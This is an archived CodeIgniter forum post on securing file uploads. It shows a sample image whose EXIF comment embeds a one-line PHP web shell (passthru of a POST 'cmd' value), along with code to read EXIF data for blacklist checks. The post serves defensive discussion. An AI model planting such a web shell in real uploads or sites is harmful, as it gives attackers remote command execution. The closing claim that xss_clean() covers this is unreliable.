Welcome Guest, Not a member yet? Register   Sign In
CodeIgniter Forums Archived Discussions Archived Development & Programming File Upload tips/tricks/best practice (in regards to security VS usability).
File Upload tips/tricks/best practice (in regards to security VS usability).
  • El Forum
    Guest
  •  
#5
11-13-2012, 06:51 AM

[eluser]LuckyFella73[/eluser]
I did some reseach about embedded image meta data and found an example
of an "infected" file:
Code:
File name    : image.jpg
File size    : 182007 bytes
File date    : 2011:09:07 21:20:10
Resolution   : 1197 x 478
Comment      : <?php passthru($_POST['cmd']); __halt_compiler();

Using an example from php.net we can read the meta data like this:
Code:
public function display_exif_data($full_path)
{
  $exif = exif_read_data($full_path, 0, true);

  foreach ($exif as $key => $section)
  {
   foreach ($section as $name => $val)
   {
    echo "$key.$name: $val<br />\n";
   }
  }
}

Instead of echoing the meta data we could check the keys and values against some kind
of blacklist. Don't know if that is a naive approach but I guess that way we
can at least lower the risk.

What do you think?


EDIT: the CI security class (xss_clean()) allready takes care of this so never mind ...


Messages In This Thread
File Upload tips/tricks/best practice (in regards to security VS usability). - by El Forum - 11-13-2012, 06:51 AM



Theme © iAndrew 2016 - Forum software by © MyBB